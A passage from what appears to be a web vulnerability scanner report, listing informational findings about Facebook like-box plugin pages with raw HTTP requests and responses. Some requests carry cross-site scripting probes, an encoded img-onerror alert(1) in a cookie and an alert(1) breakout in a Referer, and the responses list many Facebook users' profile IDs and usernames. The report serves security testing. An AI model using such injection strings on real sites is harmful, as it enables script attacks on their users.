Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.150.43
Connection: close
Date: Thu, 05 May 2011 11:41:43 GMT
Content-Length: 9755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yv/r/aDyW45UzMGZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/gamescom" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27524_16327590002_3202_q.jpg" alt="Games.com" /></a>
...[SNIP]...

16.59. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b533dbd4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1450dca4c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298
The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b533dbd4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1450dca4c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.163.29
X-Cnection: close
Date: Thu, 05 May 2011 11:41:43 GMT
Content-Length: 16920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/sportingnews" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_112585963017_76_q.jpg" alt="Sporting News" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000884642321" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/23086_100000884642321_127_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/deedee.perez1" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203061_100001922588645_5847502_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000691198810" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203131_100000691198810_2600500_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001677506211" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186306_100001677506211_2725896_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/lakendra.roberts" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195659_1694427025_5881089_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/gale.l.schenk" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/23086_1433334761_8203_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1605429091" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186714_1605429091_6843314_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001563480027" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195650_100001563480027_4575550_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=768343438" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195681_768343438_3440506_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/skdarealist" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211386_100000863514899_5837555_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000862415977" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27414_100000862415977_9649_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001927208218" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173661_100001927208218_4330449_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1003057323" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187521_1003057323_1281803_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000541068085" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48975_100000541068085_1143330_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000505084012" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211544_100000505084012_4898663_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000255574831" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203247_100000255574831_1503849_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000122242009" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211527_100000122242009_5562262_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000284158351" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161659_100000284158351_5615996_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/HockeyKen" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186091_100002020447663_2480431_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000227723086" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186026_100000227723086_3083391_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1620706090" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195432_1620706090_6822998_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002180027523" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202830_100002180027523_7402851_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.60. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2847ddde%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3632fa79c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298
The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2847ddde%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3632fa79c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.108.127
X-Cnection: close
Date: Thu, 05 May 2011 02:01:26 GMT
Content-Length: 16387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/sportingnews" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_112585963017_76_q.jpg" alt="Sporting News" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000227723086" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186026_100000227723086_3083391_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000284158351" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161659_100000284158351_5615996_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000255574831" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203247_100000255574831_1503849_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/gale.l.schenk" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/23086_1433334761_8203_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000862415977" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27414_100000862415977_9649_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000505084012" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211544_100000505084012_4898663_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1605429091" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186714_1605429091_6843314_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/skdarealist" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211386_100000863514899_5837555_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001927208218" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173661_100001927208218_4330449_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1620706090" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195432_1620706090_6822998_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1003057323" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187521_1003057323_1281803_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000541068085" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48975_100000541068085_1143330_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/deedee.perez1" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203061_100001922588645_5847502_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002180027523" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202830_100002180027523_7402851_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001677506211" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186306_100001677506211_2725896_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/HockeyKen" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211563_100002020447663_1302764_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/KickIceForever" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202988_736611069_7575841_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/theteebers" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211540_1238885907_2541593_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/lakendra.roberts" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195659_1694427025_5881089_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001563480027" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195650_100001563480027_4575550_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.61. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Faol&width=292&colorscheme=light&connections=10&stream=false&header=true&height=300
The response contains the following links to other domains:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Faol&width=292&colorscheme=light&connections=10&stream=false&header=true&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/?ba9f0%22-alert(1)-%22394da22382f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.23.105
X-Cnection: close
Date: Thu, 05 May 2011 10:57:23 GMT
Content-Length: 13443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/aol" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174868_107651419258212_7433843_q.jpg" alt="AOL" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1209024507" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174406_1209024507_6026034_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001480571054" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187169_100001480571054_4571090_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001399603033" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41466_100001399603033_9202_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001357808107" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000965163441" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161348_100000965163441_3475312_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002205135374" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203359_100002205135374_6613443_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001408469053" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187114_100001408469053_6849283_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1838834503" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203230_1838834503_3180560_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002189919976" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186487_100002189919976_7245356_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/LadyBonesie" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187654_520654614_6638206_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.62. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/likebox.php?id=8062627951&width=300&connections=10&stream=false&header=false&height=255
The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=8062627951&width=300&connections=10&stream=false&header=false&height=255 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.118.67
X-Cnection: close
Date: Thu, 05 May 2011 01:19:19 GMT
Content-Length: 12888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/techcrunch" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_8062627951_7431_q.jpg" alt="TechCrunch" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ladonna.lokey" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41763_100000233118312_2392_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000618593365" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161182_100000618593365_7043129_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/stefanoboscolomarchi" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203013_1594520820_732429_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=703272195" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203301_703272195_7499323_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/burkerkink" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161097_930382_8228585_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202910_30100351_6302006_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=583081899" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173823_583081899_855451_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/robynalys" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187666_7306067_1182998_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1516233108" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161755_1516233108_3624471_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.63. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/likebox.php?id=8062627951&width=300&connections=10&stream=false&header=false&height=255
The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=8062627951&width=300&connections=10&stream=false&header=false&height=255 HTTP/1.1
